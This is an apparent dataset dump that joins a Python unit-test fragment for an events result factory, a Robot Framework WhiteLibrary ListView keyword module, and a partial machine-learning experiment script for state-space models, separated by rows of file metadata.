EventsResultFactory.create('exception', 'events_detail', 'exception', 'Events', 'in_memory')
self.assertEqual(str(e.exception), 'Raise exception')
resource_mock.create.assert_called_once_with('events_detail')
command_mock.create.assert_called_once_with(use_case='exception', entity='Events', persistence_type='in_memory')
console_mock.assert_not_called()
html_mock.assert_not_called()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_with_exception(self, resource_mock, command_mock, console_mock, html_mock):
with self.assertRaises(Exception) as e:
EventsResultFactory.create('exception', 'events_detail', 'get_events_from_today', 'Events', 'in_memory')
self.assertEqual(str(e.exception), 'Result type exception does not supported')
resource_mock.create.assert_called_once_with('events_detail')
command_mock.create.assert_called_once_with(use_case='get_events_from_today', entity='Events', persistence_type='in_memory')
console_mock.assert_not_called()
html_mock.assert_not_called()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_cmd(self, resource_mock, command_mock, console_mock, html_mock):
EventsResultFactory.create('cmd', 'events_detail', 'get_events_from_today', 'Events', 'in_memory')
resource_mock.create.assert_called_once_with('events_detail')
command_mock.create.assert_called_once_with(use_case='get_events_from_today', entity='Events', persistence_type='in_memory')
console_mock.assert_called_once()
html_mock.assert_not_called()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_html(self, resource_mock, command_mock, console_mock, html_mock):
EventsResultFactory.create('html', 'events_detail', 'get_events_from_today', 'Events', 'in_memory')
resource_mock.create.assert_called_once_with('events_detail')
command_mock.create.assert_called_once_with(use_case='get_events_from_today', entity='Events', persistence_type='in_memory')
console_mock.assert_not_called()
html_mock.assert_called_once()
| 63.037975
| 132
| 0.781124
| 567
| 4,980
| 6.522046
| 0.10582
| 0.04543
| 0.107896
| 0.164684
| 0.898864
| 0.898864
| 0.898864
| 0.885073
| 0.873716
| 0.865062
| 0
| 0.019039
| 0.114056
| 4,980
| 78
| 133
| 63.846154
| 0.81913
| 0
| 0
| 0.606061
| 0
| 0
| 0.419076
| 0.334538
| 0
| 0
| 0
| 0
| 0.393939
| 1
| 0.106061
| false
| 0
| 0.045455
| 0.030303
| 0.19697
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5037b65828494312ee14b10d82972d43bcdec323
| 17,387
|
py
|
Python
|
src/WhiteLibrary/keywords/items/listview.py
|
Omenia/robotframework-whitelibrary
|
1d01926fc45fb08b731b14afe6875063ddbaf9fa
|
[
"Apache-2.0"
] | 54
|
2016-10-13T23:48:12.000Z
|
2022-03-04T03:35:34.000Z
|
src/WhiteLibrary/keywords/items/listview.py
|
Omenia/robotframework-whitelibrary
|
1d01926fc45fb08b731b14afe6875063ddbaf9fa
|
[
"Apache-2.0"
] | 95
|
2016-09-11T18:43:31.000Z
|
2021-02-25T18:04:03.000Z
|
src/WhiteLibrary/keywords/items/listview.py
|
Omenia/robotframework-whitelibrary
|
1d01926fc45fb08b731b14afe6875063ddbaf9fa
|
[
"Apache-2.0"
] | 19
|
2017-04-20T09:40:48.000Z
|
2022-02-25T18:52:37.000Z
|
from TestStack.White.UIItems import ListView
from WhiteLibrary.keywords.librarycomponent import LibraryComponent
from WhiteLibrary.keywords.robotlibcore import keyword
from WhiteLibrary.utils.click import Clicks
class ListViewKeywords(LibraryComponent):
@keyword
def double_click_listview_cell(self, locator, column_name, row_index, x_offset=0, y_offset=0):
"""Double clicks a listview cell.
``locator`` is the locator of the listview or ListView item object.
Locator syntax is explained in `Item locators`.
``column_name`` is the name of the column.
``row_index`` is the zero-based row index.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Cell | id:addressList | Street | 0 | # double click cell in the column "Street" of the first row |
"""
cell = self._get_cell(locator, column_name, row_index)
Clicks.double_click(cell, x_offset, y_offset)
@keyword
def double_click_listview_cell_by_index(self, locator, row_index, column_index, x_offset=0, y_offset=0):
"""Double clicks a listview cell at index.
``locator`` is the locator of the listview or ListView item object.
Locator syntax is explained in `Item locators`.
``row_index`` is the zero-based row index.
``column_index`` is the zero-based column index.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Cell By Index | id:addressList | 0 | 0 |
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
Clicks.double_click(cell, x_offset, y_offset)
@keyword
def double_click_listview_row(self, locator, column_name, cell_text, x_offset=0, y_offset=0):
"""Double clicks a listview row.
``locator`` is the locator of the listview or ListView item object.
Locator syntax is explained in `Item locators`.
``column_name`` and ``cell_text`` define the row. Row is the first matching row where text in column
``column_name`` is ``cell_text``.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Row | id:addressList | City | Helsinki | # double click row that has the text "Helsinki" in the column "City" |
"""
row = self._get_row(locator, column_name, cell_text)
Clicks.double_click(row, x_offset, y_offset)
@keyword
def double_click_listview_row_by_index(self, locator, row_index, x_offset=0, y_offset=0):
"""Double clicks a listview row at index.
``locator`` is the locator of the listview or ListView item object.
Locator syntax is explained in `Item locators`.
``row_index`` is the zero-based row index.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Row By Index | id:addressList | 4 |
"""
row = self._get_row_by_index(locator, row_index)
Clicks.double_click(row, x_offset, y_offset)
@keyword
def double_click_listview_row_by_text(self, locator, text, x_offset=0, y_offset=0):
"""Double clicks a listview row with matching text.
``locator`` is the locator of the listview or the ListView item object.
Locator syntax is explained in `Item locators`.
``text`` is the exact text of the row. If there are multiple cells on the row, the text will be matched
against the first cell.
Optional arguments ``x_offset`` and ``y_offset`` can be used to define the coordinates to click at,
relative to the center of the item.
Example:
| Double Click Listview Row By Text | id:cities | Berlin |
"""
row = self._get_row_by_text(locator, text)
Clicks.double_click(row, x_offset, y_offset)
@keyword
def get_listview_cell_text(self, locator, column_name, row_index):
"""Returns text of a listview cell.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
return cell.Text
@keyword
def get_listview_cell_text_by_index(self, locator, row_index, column_index):
"""Returns text of a listview cell at index.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
return cell.Text
@keyword
def get_listview_row_text(self, locator, column_name, cell_text):
"""Returns a list containing text of each cell in a listview row.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
row = self._get_row(locator, column_name, cell_text)
return [cell.Text for cell in row.Cells]
@keyword
def get_listview_row_text_by_index(self, locator, row_index):
"""Returns text of a listview row as a list.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
row = self._get_row_by_index(locator, row_index)
return [cell.Text for cell in row.Cells]
@keyword
def listview_cell_at_index_should_contain(self, locator, row_index, column_index, expected):
"""Verifies that the given listview cell contains text ``expected``.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
if expected not in cell.Text:
raise AssertionError(u"Cell ({}, {}) did not contain text '{}'".format(row_index, column_index, expected))
@keyword
def listview_cell_at_index_should_not_contain(self, locator, row_index, column_index, expected):
"""Verifies that the given listview cell does not contain text ``expected``.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
if expected in cell.Text:
raise AssertionError(
u"Cell ({}, {}) should not have contained text '{}'".format(row_index, column_index, expected)
)
@keyword
def listview_cell_should_contain(self, locator, column_name, row_index, expected):
"""Verifies that the given listview cell contains text ``expected``.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
if expected not in cell.Text:
raise AssertionError(u"Cell did not contain text '{}'".format(expected))
@keyword
def listview_cell_should_not_contain(self, locator, column_name, row_index, expected):
"""Verifies that the given listview cell does not contain text ``expected``.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
if expected in cell.Text:
raise AssertionError(u"Cell should not have contained text '{}'".format(expected))
@keyword
def listview_cell_text_at_index_should_be(self, locator, row_index, column_index, expected):
"""Verifies that listview cell text is ``expected``.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
if cell.Text != expected:
raise AssertionError(
u"Cell ({}, {}) text should have been '{}', found '{}'".format(
row_index, column_index, expected, cell.Text
)
)
@keyword
def listview_cell_text_at_index_should_not_be(self, locator, row_index, column_index, expected):
"""Verifies that listview cell text is not ``expected``.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
if cell.Text == expected:
raise AssertionError(
u"Cell ({}, {}) text should not have been '{}'".format(row_index, column_index, expected)
)
@keyword
def listview_cell_text_should_be(self, locator, column_name, row_index, expected):
"""Verifies that listview cell text is ``expected``.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
if cell.Text != expected:
raise AssertionError(u"Cell text should have been '{}', found '{}'".format(expected, cell.Text))
@keyword
def listview_cell_text_should_not_be(self, locator, column_name, row_index, expected):
"""Verifies that listview cell text is not ``expected``.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
if cell.Text == expected:
raise AssertionError(u"Cell text should not have been '{}'".format(expected))
@keyword
def listview_row_at_index_should_contain(self, locator, row_index, expected):
"""Verifies that any cell in the given listview row contains text ``expected``.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
row = self._get_row_by_index(locator, row_index)
for cell in row.Cells:
if expected in cell.Text:
return
raise AssertionError(u"Row {} did not contain text '{}'".format(row_index, expected))
@keyword
def listview_row_at_index_should_not_contain(self, locator, row_index, expected):
"""Verifies that any cell in the given listview row does not contain text ``expected``.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
listview = self.state._get_typed_item_by_locator(ListView, locator)
row = listview.Rows.Get(int(row_index))
for cell in row.Cells:
if expected in cell.Text:
raise AssertionError(u"Row {} should not have contained text '{}'".format(row_index, expected))
@keyword
def listview_row_should_contain(self, locator, column_name, cell_text, expected):
"""Verifies that the given listview row contains text ``expected``.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
row = self._get_row(locator, column_name, cell_text)
for cell in row.Cells:
if expected in cell.Text:
return
raise AssertionError(
u"Row defined by cell '{}'='{}' did not contain text '{}'".format(column_name, cell_text, expected)
)
@keyword
def listview_row_should_not_contain(self, locator, column_name, cell_text, expected):
"""Verifies that the given listview row does not contain text ``expected``.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
row = self._get_row(locator, column_name, cell_text)
for cell in row.Cells:
if expected in cell.Text:
raise AssertionError(
u"Row defined by cell '{}'='{}' should not have contained text '{}'".format(
column_name, cell_text, expected
)
)
@keyword
def right_click_listview_cell(self, locator, column_name, row_index, x_offset=0, y_offset=0):
"""Right clicks a listview cell using its column name and row index.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
Clicks.right_click(cell, x_offset, y_offset)
@keyword
def right_click_listview_cell_by_index(self, locator, row_index, column_index, x_offset=0, y_offset=0):
"""Right clicks a listview cell at index.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
Clicks.right_click(cell, x_offset, y_offset)
@keyword
def right_click_listview_row(self, locator, column_name, cell_text, x_offset=0, y_offset=0):
"""Right clicks a listview row that has given text in given column.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
row = self._get_row(locator, column_name, cell_text)
Clicks.right_click(row, x_offset, y_offset)
@keyword
def right_click_listview_row_by_index(self, locator, row_index, x_offset=0, y_offset=0):
"""Right clicks a listview row at index.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
row = self._get_row_by_index(locator, row_index)
Clicks.right_click(row, x_offset, y_offset)
@keyword
def right_click_listview_row_by_text(self, locator, text, x_offset=0, y_offset=0):
"""Right clicks a listview row with matching text.
See `Double Click Listview Row By Text` for details about arguments ``locator`` and ``text``.
"""
row = self._get_row_by_text(locator, text)
Clicks.right_click(row, x_offset, y_offset)
@keyword
def select_listview_cell(self, locator, column_name, row_index):
"""Selects a listview cell.
See `Double Click Listview Cell` for details about arguments ``locator``, ``column_name``, and ``row_index``.
"""
cell = self._get_cell(locator, column_name, row_index)
cell.Click()
@keyword
def select_listview_cell_by_index(self, locator, row_index, column_index):
"""Selects a listview cell at index.
See `Double Click Listview Cell By Index` for details about arguments ``locator``, ``row_index``, and ``column_index``.
"""
cell = self._get_cell_by_index(locator, row_index, column_index)
cell.Click()
@keyword
def select_listview_row(self, locator, column_name, cell_text):
"""Selects a listview row.
See `Double Click Listview Row` for details about the arguments ``locator``, ``column_name``, and ``cell_text``.
"""
listview = self.state._get_typed_item_by_locator(ListView, locator)
listview.Select(column_name, cell_text)
@keyword
def select_listview_row_by_index(self, locator, row_index):
"""Selects a listview row at index.
See `Double Click Listview Row By Index` for details about arguments ``locator`` and ``row_index``.
"""
listview = self.state._get_typed_item_by_locator(ListView, locator)
listview.Select(int(row_index))
@keyword
def select_listview_row_by_text(self, locator, text):
"""Selects a listview row with matching text.
See `Double Click Listview Row By Text` for details about arguments ``locator`` and ``text``.
"""
row = self._get_row_by_text(locator, text)
row.Select()
def _get_row(self, locator, column_name, cell_text):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return listview.Rows.Get(column_name, cell_text)
def _get_row_by_index(self, locator, index):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return listview.Rows.Get(int(index))
def _get_row_by_text(self, locator, text):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return next((row for row in listview.Rows if row.Cells[0].Text == text), None)
def _get_cell(self, locator, column_name, row_index):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return listview.Cell(column_name, int(row_index))
def _get_cell_by_index(self, locator, row, column):
listview = self.state._get_typed_item_by_locator(ListView, locator)
return listview.Rows.Get(int(row)).Cells[int(column)]
| 44.582051
| 143
| 0.663312
| 2,329
| 17,387
| 4.733791
| 0.052383
| 0.056599
| 0.06322
| 0.051882
| 0.919546
| 0.907302
| 0.881542
| 0.848345
| 0.805533
| 0.783401
| 0
| 0.001884
| 0.236901
| 17,387
| 389
| 144
| 44.696658
| 0.829062
| 0.386381
| 0
| 0.59887
| 0
| 0
| 0.054149
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 1
| 0.20339
| false
| 0
| 0.022599
| 0
| 0.293785
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
acc5a957f7978a488db2be4a2fadcbaf6c20b376
| 49,991
|
py
|
Python
|
ief_core/tests/old_tests/test_ssm.py
|
zeshanmh/ief
|
1b7dbd340ecb8ccf40d22de989e3bc3d92135a45
|
[
"MIT"
] | 5
|
2021-04-11T04:49:24.000Z
|
2022-03-28T18:43:45.000Z
|
ief_core/tests/old_tests/test_ssm.py
|
clinicalml/ief
|
97bcaad85ec820fbe062a86c6c500a308904f029
|
[
"MIT"
] | 1
|
2021-12-13T06:33:16.000Z
|
2021-12-16T02:04:14.000Z
|
ief_core/tests/old_tests/test_ssm.py
|
zeshanmh/ief
|
1b7dbd340ecb8ccf40d22de989e3bc3d92135a45
|
[
"MIT"
] | 1
|
2020-12-21T14:01:29.000Z
|
2020-12-21T14:01:29.000Z
|
import torch
import torch.nn as nn
import numpy as np
import pytorch_lightning as pl
import sys
import os
import optuna
from lifelines.utils import concordance_index
from sklearn.metrics import r2_score
from torch.utils.data import DataLoader, TensorDataset
from torchcontrib.optim import SWA
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from argparse import ArgumentParser
from distutils.util import strtobool
sys.path.append('../')
sys.path.append('../../data/ml_mmrf')
sys.path.append('../../data/')
from ml_mmrf_v1.data import load_mmrf
from synthetic.synthetic_data import load_synthetic_data_trt, load_synthetic_data_noisy
from semi_synthetic.ss_data import *
from models.ssm.ssm import SSM, SSMAtt
from models.ssm.ssm_baseline import SSMBaseline
def test_ssm_sota():
sys.path.append('../../../trvae')
sys.path.append('../../../trvae/dmm')
sys.path.append('../../../trvae/models')
from dmm import DMM
ddata = load_ss_data(1000, gen_fly=True, eval_mult=500, in_sample_dist=False, add_missing=True)
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
# _, valid_loader = load_ss_helper(ddata, tvt='valid', device=device, bs=600)
dim_stochastic = 48; dim_hidden = 300
dim_base = ddata['train']['B'].shape[-1]
dim_data = ddata['train']['X'].shape[-1]
dim_treat = ddata['train']['A'].shape[-1]
C = 0.01; ttype = 'gated'; etype = 'lin'
model = DMM(dim_stochastic, dim_hidden, dim_base, dim_data, dim_treat, C = C, ttype = ttype, etype=etype,
inftype = 'rnn_relu', combiner_type = 'pog', include_baseline = True, reg_type = 'l1', reg_all=True, augmented=False)
model.to(device)
fname = '../../../trvae/dmm/good_models/sota_ssm_mm.pt'
print ('loading',fname)
model.load_state_dict(torch.load(fname))
print(f'eval set size: {ddata["valid"][0]["X"].shape}')
nelbos = []
for i in range(5):
_, valid_loader = load_ss_helper(ddata, tvt='valid', bs=600, device=device, valid_fold=i)
batch_nelbos = []
for i_batch, valid_batch_loader in enumerate(valid_loader):
(nelbo, nll, kl, _), _ = model.forward_unsupervised(*valid_batch_loader, anneal = 1.)
nelbo, nll, kl = nelbo.item(), nll.item(), kl.item()
batch_nelbos.append(nelbo)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
nelbos.append(np.mean(batch_nelbos))
print(f'NELBO (on ss data) of trained model from which semi-synthetic dataset was sampled: {np.mean(nelbos)}, std: {np.std(nelbos)}')
# batch_nelbos = []
# for i_batch, valid_batch_loader in enumerate(valid_loader):
# (nelbo, nll, kl, _), _ = model.forward_unsupervised(*valid_batch_loader, anneal = 1.)
# nelbo, nll, kl = nelbo.item(), nll.item(), kl.item()
# batch_nelbos.append(nelbo)
# (nelbo, nll, kl, _), _ = model.forward_unsupervised(*valid_loader.dataset.tensors, anneal = 1.)
# print(f'NELBO (on ss data) of trained model from which semi-synthetic dataset was sampled: {np.mean(batch_nelbos)}')
def test_ssm_load():
checkpoint_path = '../tbp_logs/ssm_lin_semi_synthetic_subsample_best_epoch=03689-val_loss=-225.67.ckpt'
checkpoint = torch.load(checkpoint_path, map_location=lambda storage, loc: storage)
hparams = checkpoint['hyper_parameters']
ssm = SSM(**hparams); ssm.setup(1)
ssm.load_state_dict(checkpoint['state_dict'])
assert 'dim_data' in ssm.hparams
assert 'dim_treat' in ssm.hparams
assert 'dim_base' in ssm.hparams
assert ssm.hparams['ttype'] == 'lin'
valid_loader = ssm.val_dataloader()
(nelbo, nll, kl, _), _ = ssm.forward(*valid_loader.dataset.tensors, anneal = 1.)
print(nelbo)
def run_ssm_ss():
seed_everything(0)
model_configs = [ # samples, ttype, ds, C, reg_all, reg_type, lr
# (1000, 'lin', 41, 0.007191, False, 'l2', .004308),
# (1500, 'lin', 60, 0.0022656, True, 'l2', .0041245),
# (2000, 'lin', 49, 0.0466374, True, 'l2', .0046789),
# (1000, 'lin', 48, 0.01, False, 'l2', 1e-3),
# (1500, 'lin', 48, 0.01, False, 'l2', 1e-3),
# (2000, 'lin', 48, 0.01, False, 'l2', 1e-3),
# (10000, 'lin', 22, 0.002625, False, 'l2', .0033782),
(1000, 'lin', 48, 0.01, True, 'l2', 1e-3),
(1500, 'gated', 48, 0.01, True, 'l2', 1e-3),
(2000, 'gated', 48, 0.01, False, 'l2', 1e-3)
# (10000, 'gated', 55, 0.001212, False, 'l1', .0037642)
]
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm_baseline', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=True, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=True, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from FOMM and base trainer
parser = SSMBaseline.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
# fi = open('./ssm_ss_results.txt', 'w')
for k,model_config in enumerate(model_configs):
nsamples_syn, ttype, dim_stochastic, C, reg_all, reg_type, lr = model_config
args.max_epochs = 10000
args.nsamples_syn = nsamples_syn
args.ttype = ttype
args.dim_stochastic = dim_stochastic
args.dim_hidden = 300
args.alpha1_type = 'linear'
args.add_stochastic = False
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
args.lr = lr
dict_args = vars(args)
trial = optuna.trial.FixedTrial({'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
# initialize FOMM w/ args and train
model = SSMBaseline(trial, **dict_args)
in_sample_dist = model.hparams.ss_in_sample_dist; add_missing = model.hparams.ss_missing
print(f'[RUNNING] model config {k+1}: N = {args.nsamples_syn}, ttype = {args.ttype}, C = {args.C}, reg_all = {args.reg_all}, reg_type = {args.reg_type}, in_sample_dist = {in_sample_dist}, add_missing = {add_missing}')
# fi.write(f'[RUNNING] model config {k+1}: N = {args.nsamples_syn}, ttype = {args.ttype}, C = {args.C}, reg_all = {args.reg_all}, reg_type = {args.reg_type}, in_sample_dist = {in_sample_dist}, add_missing = {add_missing}\n')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[2], check_val_every_n_epoch=10)
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:2')
else:
device = torch.device('cpu')
ddata = load_ss_data(model.hparams['nsamples_syn'], gen_fly=True, eval_mult=200, in_sample_dist=in_sample_dist, add_missing=add_missing)
print(f'eval set size: {ddata["valid"][0]["X"].shape}')
nelbos = []
for i in range(1,5):
_, valid_loader = load_ss_helper(ddata, tvt='valid', bs=model.hparams['bs'], device=device, valid_fold=i)
batch_nelbos = []
for i_batch, valid_batch_loader in enumerate(valid_loader):
(nelbo, nll, kl, _), _ = model.forward(*valid_batch_loader, anneal = 1.)
nelbo, nll, kl = nelbo.item(), nll.item(), kl.item()
batch_nelbos.append(nelbo)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
nelbos.append(np.mean(batch_nelbos))
print(f'[COMPLETE] model config {k+1}: mean nelbo: {np.mean(nelbos)}, std nelbo: {np.std(nelbos)}')
# fi.write(f'[COMPLETE] model config {k+1}: mean nelbo: {np.mean(nelbos)}, std nelbo: {np.std(nelbos)}\n\n')
print()
def run_ssm_ss2():
seed_everything(1)
# model_configs = [
# (1000, 'moe', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2
# (1500, 'moe', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2
# (2000, 'moe', 48, 0.01, True, 'l2') # 48.000, 0.010000, 1.0000, l2
# ]
model_configs = [
(1000, 'lin', 64, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2 -86.93002059979317, std nelbo: 2.308720455440082
(1500, 'lin', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 0.0000, l2 -90.58635519101071, std nelbo: 3.337732785962744
(2000, 'lin', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 0.0000, l2 -80.53742721753244, std nelbo: 0.9132054166247399
(1000, 'gated', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2 -55.076445347223526, std nelbo: 4.1150217727133525
(1000, 'gated', 64, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2
(1500, 'gated', 48, 0.01, True, 'l2'), # 48.000, 0.010000, 1.0000, l2 -93.4233535405917, std nelbo: 2.099412335001398
(2000, 'gated', 64, 0.01, True, 'l2'), # 48.000, 0.010000, 0.0000, l2
# (21000, 'gated', 48, 0.01, False, 'l2') # 48.000, 0.010000, 1.0000, l2 #-173.1242269819433, std nelbo: 0.53154754771723
]
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='semi_synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=1000, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=True, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from FOMM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
for k,model_config in enumerate(model_configs):
nsamples_syn, ttype, dim_stochastic, C, reg_all, reg_type = model_config
args.max_epochs = 10000
args.nsamples_syn = nsamples_syn
args.ttype = ttype
args.dim_stochastic = dim_stochastic
args.dim_hidden = 300
args.alpha1_type = 'linear'
args.add_stochastic = False
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
dict_args = vars(args)
# initialize FOMM w/ args and train
model = SSM(**dict_args)
in_sample_dist = model.hparams.ss_in_sample_dist; add_missing = model.hparams.ss_missing
print(f'[RUNNING] model config {k+1}: N = {args.nsamples_syn}, ttype = {args.ttype}, C = {args.C}, reg_all = {args.reg_all}, reg_type = {args.reg_type}, in_sample_dist = {in_sample_dist}, add_missing = {add_missing}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[0], check_val_every_n_epoch=10)
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
ddata = load_ss_data(model.hparams['nsamples_syn'], gen_fly=True, eval_mult=200, in_sample_dist=in_sample_dist, add_missing=add_missing)
print(f'eval set size: {ddata["valid"][0]["X"].shape}')
nelbos = []
for i in range(1,5):
_, valid_loader = load_ss_helper(ddata, tvt='valid', bs=model.hparams['bs'], device=device, valid_fold=i)
batch_nelbos = []
for i_batch, valid_batch_loader in enumerate(valid_loader):
(nelbo, nll, kl, _), _ = model.forward(*valid_batch_loader, anneal = 1.)
nelbo, nll, kl = nelbo.item(), nll.item(), kl.item()
batch_nelbos.append(nelbo)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
nelbos.append(np.mean(batch_nelbos))
